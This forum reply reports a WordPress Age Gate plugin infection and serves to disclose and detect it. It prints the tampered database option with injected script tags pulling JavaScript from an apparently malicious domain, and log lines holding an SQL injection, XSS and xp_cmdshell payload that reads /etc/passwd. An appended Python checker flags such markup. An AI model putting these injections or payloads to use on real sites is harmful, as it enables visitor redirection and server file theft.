Forum Replies Created

Viewing 1 replies (of 1 total)
  • Just got notified by a client that the age gate looks different on his website. After a quick check, I was redirected to a clickbait site.

    I can confirm that the infection happens in the wp_options table in a record with the option_name of wp_age_gate_messages.

    Here’s the content of the infected option_value:

    a:15:{s:11:"instruction";s:0:"";s:9:"messaging";s:0:"";s:17:"invalid_input_msg";s:22:"Your input was invalid";s:13:"under_age_msg";s:43:"You are not old enough to view this content";s:17:"generic_error_msg";s:35:"An error occurred, please try again";s:16:"remember_me_text";s:11:"Remember me";s:14:"yes_no_message";s:29:"Are you over %s years of age?";s:8:"yes_text";s:70:"Yes<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:7:"no_text";s:69:"No<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:10:"additional";s:0:"";s:11:"button_text";s:6:"Submit";s:14:"cookie_message";s:85:"Your browser does not support cookies, you may experience problems entering this site";s:8:"text_day";s:3:"Day";s:10:"text_month";s:5:"Month";s:9:"text_year";s:4:"Year";}

    The Age-Gate version which is currently in use: 2.16.4

    I was able to pull out the following activity from the logs which could be a possible attack vector:

    46.161.27.0 - - [02/Oct/2021:18:25:13 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

    46.161.27.0 - - [02/Oct/2021:18:25:18 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css?AlSV%3D5166%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

    46.161.27.0 - - [02/Oct/2021:18:25:19 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

    • This reply was modified 3 years, 1 month ago by kreativrudel.
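
One way to check an exported option_value for this kind of injection, added here as an example and not part of the original reply or of the Age Gate plugin: it parses the PHP-serialized array, verifies the declared string lengths, and reports fields that contain active markup. The function names, the pattern list and the sample (with its placeholder host) are assumptions made for illustration; the parser covers only arrays, strings, integers and booleans.

```python
import re

# Markup that should never appear in Age Gate's plain-text message fields.
SUSPICIOUS = re.compile(rb"<\s*(script|iframe|object|embed)\b|javascript:", re.I)

def parse(buf, pos=0):
    """Parse one PHP-serialized value at buf[pos:]; return (value, next_pos)."""
    tag = buf[pos:pos + 1]
    if tag in (b"i", b"b"):                      # i:5;  b:1;
        end = buf.index(b";", pos)
        return int(buf[pos + 2:end]), end + 1
    if tag not in (b"s", b"a"):
        raise ValueError(f"unsupported type {tag!r} at offset {pos}")
    colon = buf.index(b":", pos + 2)
    n, start = int(buf[pos + 2:colon]), colon + 2
    if tag == b"s":                              # s:<byte length>:"...";
        if buf[colon + 1:start] != b'"' or buf[start + n:start + n + 2] != b'";':
            raise ValueError(f"string length mismatch at offset {pos}")
        return buf[start:start + n], start + n + 2
    out, pos = {}, start                         # a:<count>:{key;value;...}
    for _ in range(n):
        key, pos = parse(buf, pos)
        out[key], pos = parse(buf, pos)
    if buf[pos:pos + 1] != b"}":
        raise ValueError(f"array not closed at offset {pos}")
    return out, pos + 1

def find_injected(option_value):
    """Return {key path: value} for every string value holding active markup."""
    data, _ = parse(option_value.encode("utf-8"))
    hits = {}
    def walk(node, path):
        if isinstance(node, dict):
            for k, v in node.items():
                walk(v, path + [k.decode() if isinstance(k, bytes) else str(k)])
        elif isinstance(node, bytes) and SUSPICIOUS.search(node):
            hits["/".join(path)] = node.decode("utf-8", "replace")
    walk(data, [])
    return hits

def _ser(d):  # builds the constructed sample with correct byte lengths
    return "a:%d:{%s}" % (len(d), "".join(
        's:%d:"%s";s:%d:"%s";' % (len(k.encode()), k, len(v.encode()), v)
        for k, v in d.items()))

# Constructed sample shaped like the option above; the host is a placeholder.
SAMPLE = _ser({"button_text": "Submit", "under_age_msg": "You are not old enough",
               "yes_text": "Yes<script src='https://cdn.example.invalid/x.js'></script>",
               "no_text": "No<script src='https://cdn.example.invalid/x.js'></script>"})
```

Calling `find_injected(SAMPLE)` returns the `yes_text` and `no_text` entries; a `ValueError` means a declared length does not match the stored bytes, which is itself worth investigating in a hand-edited or tampered row.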